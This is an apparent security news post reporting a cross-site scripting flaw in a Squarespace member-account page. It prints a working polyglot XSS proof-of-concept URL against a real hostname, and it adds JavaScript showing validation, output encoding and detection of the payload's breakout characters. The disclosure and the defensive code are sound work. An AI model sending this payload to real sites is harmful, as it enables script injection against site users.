Cross Site Scripting vulnerability found in Squarespace blogging app


The grey hat hacker "Sony" has come up with an interesting XSS find. Squarespace, one of the popular and best blogging/content management web applications, is vulnerable to an XSS attack.

PoC:
http://sonystyles.squarespace.com/display/configuration/CreateOrModifyMemberAccount?accountId=2095672%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

The XSS attack can be viewed after member login. Squarespace powers tens of thousands of websites with billions of monthly hits; all of them might be vulnerable to this attack.
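As an added example (not Squarespace code and not from the original post), the JavaScript below takes the `accountId` value from the PoC URL above and shows how an allow-list check and context-aware output encoding handle it. The function names are hypothetical, and the rule that account IDs are plain decimal integers is an assumption based on the `2095672` prefix; the post does not say where the value is reflected.

```javascript
// Added example, not Squarespace code. POC_URL is the URL quoted in the post.
const POC_URL = String.raw`http://sonystyles.squarespace.com/display/configuration/CreateOrModifyMemberAccount?accountId=2095672%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E`;

// Pull the decoded parameter out of the URL, as a server framework would.
function accountIdFromUrl(url) {
  return new URL(url).searchParams.get("accountId");
}

// Assumption: account IDs are plain decimal integers (the PoC starts with 2095672).
// Allow-list validation: anything else is rejected before it reaches a template.
function parseAccountId(raw) {
  return /^[0-9]{1,19}$/.test(raw) ? raw : null;
}

// Characters the polyglot relies on to leave a quoted string, attribute or element.
// Useful as a logging/detection signal when a numeric parameter fails validation.
function breakoutChars(raw) {
  return [...new Set(raw.match(/['"<>\\]/g) || [])].sort();
}

// Encoding for HTML text and quoted-attribute contexts.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Encoding for a string literal placed inside an inline <script> block:
// JSON-quote it, then hide characters the HTML parser would still react to.
function escapeJsString(s) {
  return JSON.stringify(s).replace(/[<>&\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

const pocValue = accountIdFromUrl(POC_URL);
console.log("valid id:", parseAccountId(pocValue));          // rejected
console.log("breakout chars:", breakoutChars(pocValue).join(" "));
console.log("HTML context:", escapeHtml(pocValue));
console.log("JS string context:", escapeJsString(pocValue));
```

Validation alone would stop this request; the two encoders matter for values that cannot be restricted to digits.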

About Squarespace:
Squarespace is a web publishing (blogging/content management) company that sells a software publishing platform and file server service to individuals and businesses, providing them the tools and assistance to create and maintain well-designed websites.

source:
http://st2tea.blogspot.com/2012/02/squarespace-cross-site-scripting.html